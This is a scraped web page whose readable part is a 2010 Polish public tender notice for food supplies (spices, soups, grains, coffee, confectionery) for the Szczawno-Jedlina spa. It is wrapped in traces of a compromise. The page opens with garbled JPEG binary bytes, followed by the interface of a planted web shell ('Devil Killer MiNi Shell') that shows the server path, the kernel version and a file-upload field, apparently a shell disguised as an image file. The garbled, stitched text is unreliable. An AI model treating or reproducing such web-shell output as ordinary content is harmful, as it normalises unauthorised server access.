JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/84501-N-2010.html

<p class="kh_header"><b>Szczawno Zdrój: Dostawy artykułów spożywczych różnych do Punktów Żywienia
Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju</b><br>
<b>Numer ogłoszenia: 84501 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Szczawno-Jedlina S.A. , ul. Ratuszowa 1, 58-310 Szczawno Zdrój, woj. dolnośląskie, tel. 074 8493201, faks 074 8436764.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko.szczawno-jedlina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych różnych do Punktów Żywienia
Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy artykułów spożywczych różnych do Punktów Żywienia Uzdrowiska Szczawno-Jedlina S.A. w Szczawnie Zdroju.PRZEDMIOT ZAMÓWIENIA ZOSTAŁ PODZIELONY NA CZTERY ZADANIA: 
Zadanie nr  1:    Dostawy przypraw, sosów i zup
Zadanie nr 2:  Dostawy mąki, kaszy, ryżu, makaronów i produktów zbożowych (płatki, kleiki, kaszki, wafle ryżowe, wafle suche, suchary, pieczywo chrupkie)
Zadanie nr  3:   Dostawy kawy, herbaty i produktów podobnych
Zadanie nr 4:  Dostawy soli, cukru i wyrobów cukierniczych, kakao, bakalii oraz koncentratów deserów (budynie, kisiele, galaretki), kwasku cytrynowego, żelatyny
Zamawiający oszacował zapotrzebowanie na wymienione produkty na okres 12 miesięcy. Ilości te stanowią wartość szacunkową, co oznacza, że ostateczna ilość zamawiana na podstawie umowy może ulec zmianie. Wykonawcy nie przysługują względem Zamawiającego jakiekolwiek roszczenia z tytułu niezrealizowania pełnej ilości przedmiotu zamówienia.Zadanie nr 1: Dostawy przypraw, sosów i zup

LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	Aroma mix maślano-ziołowy mieszanka przypraw takich, jak natka pietruszki, majeranek, cząber, gałka muszkatołowa, pieprz biały i lubczyk z delikatnym sosem, zawartość sodu nie więcej niż 8,8 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny.	1,1 kg	5
2	Auszpik - żelatyna spożywcza wieprzowa 100% do przygotowywania słodkich deserów lub słonych przekąsek, przystawek, zawartość sodu nie więcej niż 0,495 g, typu Knorr, Winiary, Prymat lub równoważny.	 0,8 kg	4
3	Barszcz biały, zawartość sodu nie więcej niż 0,32 g na 100 g produktu, wydajność 51 l, typu Knorr, Winiary, Prymat lub równoważny	3 kg	13
4	Barszcz czerwony, zawartość sodu nie więcej niż 0,5 g na 100 g produktu, wydajność 17 l, typu Knorr, Winiary, Prymat lub równoważny	1,4 kg	60
5	Bazylia	10 g	20
6	Bulion jarzynowy (drobiowy) z cząstkami warzyw, wydajność opakowania 1 kg nie mniejsza niż 45 litrów (200 porcji po 250 ml) typu Winiary, Prymat, Knorr lub równoważny 	1 kg	246
7	Czosnek mielony	20 g	2150
8	Delikat - mieszanka przypraw do mięs w składzie m. in. papryka, cebula, czosnek, pietruszka, typu Knorr, Winiary, Prymat lub równoważny 	0,7 kg	18
9	Delikat - mieszanka przypraw do ryb w składzie m.in. natka pietruszki, koperek, tymianek, czosnek, imbir typu Knorr, Winiary, Prymat lub równoważny 	0,6 kg	13
10	Fix do gulaszu, zawartość sodu nie więcej niż 0,40 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,1 kg	7
11	Fix do potraw chińskich, zawartość sodu nie więcej niż 0,61 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	5
12	Goździki	10 g	5
13	Kminek	20 g	245
14	Koper suszony	1 kg	5
15	Liść laurowy	20 g	1100
16	Majeranek	16 g	1120
17	Mieszanka przyprawowo-warzywna typu Vegetta, Ziarenka Smaku, Kucharek lub równoważna	500 g	860
18	Papryka mielona	1 kg	13
19	Papryka mielona	15 g	1430
20	Pieprz mielony	20 g	2230
21	Pieprz ziołowy	20 g	1220
22	Pietruszka suszona	1 kg	5
23	Przyprawa grzybowa o konsystencji pasty - kompozycja przypraw, tłuszczu i soli na bazie pieczarek z aromatem leśnych grzybów , duża wydajność nie mniejsza niż 1 łyżeczka na 1 l, zawartość sodu nie więcej niż 4,84 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	340 g	10
24	Przyprawa do gyrosa	30 g	34
25	Przyprawa w płynie, typu Maggi lub równoważna	960 ml	900
26	Sos 4 sery z brokułami na bazie serów typu mozarella, niebieskich pleśniowych oraz innych serów dojrzewających, zawartość sodu nie więcej niż 0,42 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny 	0,9 kg	10
27	Sos biały - baza do przygotowywania jasnych sosów, zawartość sodu nie więcej niż 0,38 g na 100 g produktu, typu Knorr lub równoważny 	3 kg	3
28	Sos cygański z kawałkami papryki do mięs, drobiu, pyz, typu Knorr, Winiary, Prymat lub równoważny 	1,1 kg	5
29	Sos cytrynowo-maślany, zawartość sodu nie więcej niż 0,54 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	5
30	Sos do spaghetti Carbonara z boczkiem, zawartość sodu nie więcej niż 0,40 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny 	0,9 kg	3
31	Sos do spaghetti Napoli  Bolognese, zawartość sodu nie więcej niż 0,83 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1 kg	24
32	Sos grzybowy, typu Knorr, Winiary, Prymat lub równoważny	1,1 kg	17
33	Sos myśliwski, zawartość sodu nie więcej niż 0,38 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,1 kg	3
34	Sos sałatkowy ogrodowy - sos o smaku cytrynowo-ziołowym, do stosowania również jako marynata, typu Knorr, Winiary, Prymat lub równoważny 	0,7 kg	2
35	Sos pieczarkowo-borowikowy, typu Knorr, Winiary, Prymat lub równoważny	1 kg	13
36	Sos pieczeniowy, typu Knorr, Winiary, Prymat lub równoważny	1,2 kg	17
37	Sos pieprzowy, zawartość sodu nie więcej niż 0,55 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1 l	7
38	Sos sałatkowy czosnkowy, zawartość sodu nie więcej niż 0,425 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	4
39	Sos sałatkowy grecki kompozycja  ziół, przypraw i warzyw: oregano, rozmarynu, kolendry, natki pietruszki, pieprzu cayenne, kurkumy, szalotki, zawartość sodu nie więcej niż 0,66 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	2
40	Sos sałatkowy koperkowy, typu Knorr, Winiary, Prymat lub równoważny	0,8 kg	2
41	Sos sałatkowy Tysiąc Wysp, zawartość sodu nie więcej niż 0,40 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,7 kg	17
42	Sos węgierski, zawartość sodu nie więcej niż 0,37 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,2 kg	3
43	Sos z zielonym pieprzem - sos pieczeniowy z cząsteczkami zielonego pieprzu do mięs, rolad oraz mięs z grilla.	1,2 kg	3
44	Ziele angielskie	15 g	950
45	Zioła prowansalskie	10 g	30
46	Zupa brokułowa, zawartość sodu nie więcej niż 0,32 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,3 kg	8
47	Zupa cebulowa, zawartość sodu nie więcej niż 0,45 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	0,63 kg	6
48	Zupa jarzynowa	1 kg	3
49	Zupa kalafiorowa, zawartość sodu nie więcej niż 0,33 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	3
50	Zupa krem z borowików, zawartość sodu nie więcej niż 0,37 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,4 kg	3
51	Zupa ogonowa - ciemna zupa, baza da przygotowania zup gulaszowych lub węgierskich zawartość sodu nie więcej niż 0,43 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny 	3 kg	75
52	Zupa pieczarkowa, zawartość sodu nie więcej niż 0,30 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	39
53	Zupa porowa, zawartość sodu nie więcej niż 0,33 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	2,9 kg	9
54	Zupa szparagowa, zawartość sodu nie więcej niż 0,36 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	6
55	Żurek, zawartość sodu nie więcej niż 0,39 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	46
Zadanie nr 2: Dostawy mąki, kaszy, ryżu, makaronów i produktów zbożowych (płatki, kleiki, kaszki, wafle ryżowe, wafle suche, suchary, pieczywo chrupkie)

LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	Chrupki kukurydziane typu Świteź-Bis lub równoważne	70 g	500
2	Kasza gryczana	1 kg	710
3	Kasza jęczmienna	1 kg	1220
4	Kasza kukurydziana	1 kg	545
5	Kasza manna	1 kg	700
6	Kleik ryżowy	180 g	60
7	Kotlety sojowe	200 g	30
8	Makaron	1 kg	2300
9	Makaron bezglutenowy	1 kg	20
10	Mąka bezglutenowa	1 kg	8
11	Mąka krupczatka	1 kg	50
12	Mąka pszenna	1 kg	4350
13	Mąka ziemniaczana	1 kg	250
14	Pieczywo lekkie różne rodzaje typu Wasa, Sonko lub równoważne 	140-170 g	150
15	Płatki śniadaniowe,  czekoladowe muszelki lub kuleczki , zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu, typu Nesquik, Chocapic lub równoważne 	250 g	15
16	Płatki kukurydziane, zawartość błonnika nie mniejsza niż  3,0 g w 100 g produktu, 	1 kg	230
17	Płatki śniadaniowe,  zbożowe kółeczka z miodem, zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu, typu Cheerios lub równoważne 	250 g	82
18	Płatki owsiane	1 kg	670
19	Płatki ryżowe	1 kg	158
20	Ryż	1 kg	2500
21	Ryż w torebkach	400 g	5
22	Sucharki bez dodatku cukru typu Mamut lub równoważne	285 g	131
23	Sucharki delikatesowe extra typu Mamut lub równoważne	290 g	156
24	Wafle ryżowe typu Sonko lub równoważne	130 g	282
25	Wafle suche	130 g	15
Zadanie nr 3: Dostawy kawy, herbaty i produktów podobnych;

LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	Cappuccino- napój kawowy instant, różne smaki, pakowany w saszetki, typu Moccate lub równoważne 	150 g (10 x 15g)	10
2	Herbata ekspresowa czarna, pojedyncza torebka 1,4 g  typu Saga lub równoważna 	300 torebek	1780
3	Herbata ekspresowa w torebkach 2 g, ze sznurkiem do szybkiego zaparzania, typu Lipton Yellow Label, Tetley lub równoważna	50 torebek	101
4	Herbata owocowa w torebkach 2 g typu Saga lub równoważna	25 torebek	50
5	 Herbata owocowa w torebkach 2,3 g, różne smaki (m.in. miętowa, zielona, malinowa, rumianek z pomarańczą, owoce lasu, aronia, jabłko z gruszką) typu Herbapol lub równoważna	25 torebek	120
6	Kawa rozpuszczalna 100 % typu Jakobs Velvet, Nescafe Classic lub równoważna	200 g	126
7	Kawa zbożowa typu Inka lub równoważna	150 g	600
8	Kawa rozpuszczalna o delikatnym smaku i bogatym aromacie (100 % naturalnej kawy), w szklanym słoiku o poj. 200 g, typu Nescafe Espiro lub równoważna	200 g	24
9	 Kawa rozpuszczalna produkowana z palonych ziaren (100 % naturalnej kawy), w szklanym słoiku o poj. 200 g, typu Jacobs Cronat Gold lub równoważna 	200 g	1
10	 Kawa rozpuszczalna o intensywnym smaku i mocnym aromacie, produkowana z palonych ziaren (100 % naturalnej kawy), w szklanym słoiku o poj. 200 g, typu Nescafe Gold All Italiana lub równoważna	200 g	12
11	Kawa 3 w 1 w saszetkach po 18 g, typu Jacobs, Tchibo lub równoważna	20 saszetek	24
12	Kawa 2 w 1  w saszetkach po 18 g, typu Jacobs, Tchibo lub równoważna 	20 saszetek	24
Zadanie nr 4: Dostawy soli, cukru i wyrobów cukierniczych, kakao, bakalii oraz koncentratów deserów (budynie, kisiele, galaretki), kwasku cytrynowego, żelatyny:

LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	 Biszkopty z galaretką oblane mleczną czekoladą (15 %), bez konserwantów, różne smaki, typu Delicje Szampańskie firmy Wedel lub równoważne 	147 g	36
2	 Biszkopty z galaretką oblane mleczną czekoladą (15 %), bez konserwantów, różne smaki, typu Delicje Szampańskie firmy Wedel lub równoważne 	294 g	36
3	Budyń	60 g	1500
4	Budyń	1 kg	12
5	Ciastka, wafle, andruty, maczki (pastylki z maczkiem kolorowym), różne rodzaje, luzem	1 kg	49
6	 Ciastka suche: kruche, z nadzieniem, markizy (w proporcjonalnych ilościach) o różnych smakach i kształtach w opakowaniach 150 g - 500 g	op. 	24
7	Cukier biały	1 kg	10160
8	Cukier puder	1 kg	100
9	Cukier waniliowy	16 g	770
10	Cukier w saszetkach, cukier biały porcjonowany w saszetki o pojemności 5 g 	5 g 	120
11	Cukierki osobno zawijane, różne rodzaje (karmelkowe, landrynki, krówki, z nadzieniem musującym itp.) 	1 kg	40
12	 Cukierki czekoladowe, osobno zawijane, różne rodzaje typu Michałki, Kasztanki, Malaga lub równoważne	kg	6
13	Cynamon	18 g	190
14	Czekolada, różne smaki i rodzaje, typu Wedel,  lub równoważna	100 g	254
15	Deser Panna Cotta typu Carte d or lub równoważny	0,8 kg	2
16	Galaretka owocowa	75 g	1100
17	Galaretka owocowa	1 kg	6
18	Herbatniki typu Petit Beurre lub równoważne	50 g	2750
19	Kakao, ciemne, gorzkie, o mocnym aromacie, wydajne, niskotłuszczowe nadające się do wypieków.	100 g	230
20	Kakao rozpuszczalne typu Puchatek lub równoważne	500 g	1
21	Kisiel	60 g	1100
22	Kisiel	1 kg	9
23	Krem orzechowo-czekoladowy do smarowania z orzechami typu Nutella lub równoważny	350 g	10
24	Krakersy słone typu Lajkonik lub równoważne	180 g	24
25	Kwasek cytrynowy	15 g	2120
26	Lizaki (Zamawiający dopuszcza oferowanie lizaków w opakowaniach po 50 szt.)	szt.	2500
27	Migdały płatki	1 kg	5
28	Olejek do ciast	10 ml	50
29	Orzechy włoskie	100 g	100
30	Owocowe galaretki w słodkiej posypce, półksiężyce	160 g	24
31	 Paluszki słone typu Lajkonik lub równoważne	120 g	24
32	Precelki chrupkie słone typu Lajkonik lub równoważne	130 g	24
33	 Pierniki nadziewane w polewie czekoladowej, różne rodzaje i kształty typu Wedel, Kopernik lub równoważne	150-160 g	24
34	Proszek do pieczenia	16 g	500
35	 Praliny z chrupiącego wafelka, z nadzieniem kremowym, wewnątrz migdał, posypane wiórkami kokosowymi, w opakowaniu zbiorczym, typu Rafaello firmy Ferrero lub równoważne	240 g	24
36	Praliny z chrupiącego wafelka, z nadzieniem kremowym, wewnątrz orzech, obsypane orzechami laskowymi, w opakowaniu zbiorczym, typu Ferrero Rocher firmy Ferrero lub równoważne	200 g	24
37	 Ptasie mleczko - pianka oblana prawdziwą czekoladą (26 %), różne smaki, typu Ptasie mleczko firmy Wedel lub równoważne	420 g	24
38	Rodzynki	200 g	100
39	Sezam	1 kg	5
40	Słonecznik łuskany	1 kg	30
41	Soda oczyszczona	50 g	34
42	Sól	1 kg	2550
43	Śmietana w proszku typu Śnieżka lub równoważne	60 g	100
44	Wafelek typu Grześki bez czekolady lub równoważny	28 g	3060
45	Wafle przekładane, różne smaki, typu Familijne firmy Jutrzenka lub równoważne	180 g	36
46	Wiórki kokosowe	200 g	103
47	Żelatyna	50 g	520.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.10.00-4, 15.89.10.00-0, 15.61.20.00-1, 03.21.13.00-6, 15.85.11.00-9, 15.61.33.00-1, 15.86.00.00-4, 15.87.24.00-5, 15.84.00.00-8, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełniaw oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawców postawionych warunków odbędzie się wg formuły spełnia - nie spełniaw oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w pkt VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>b.	zaświadczenie lub inny dokument właściwego organu Państwowej Inspekcji Sanitarnej o objęciu nadzorem funkcjonowania systemu HACCP u Wykonawcy, bądź kopię certyfikatu potwierdzającego stosowanie systemu HACCP wydany przez jednostki posiadające stosowne akredytacje. Przedłożony dokument powinien potwierdzać, że Wykonawca wdrożył oraz stosuje zasady systemu HACCP; 
c.	aktualna decyzja lub zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej dopuszczająca środek transportu do przewozu artykułów spożywczych będących przedmiotem zamówienia;
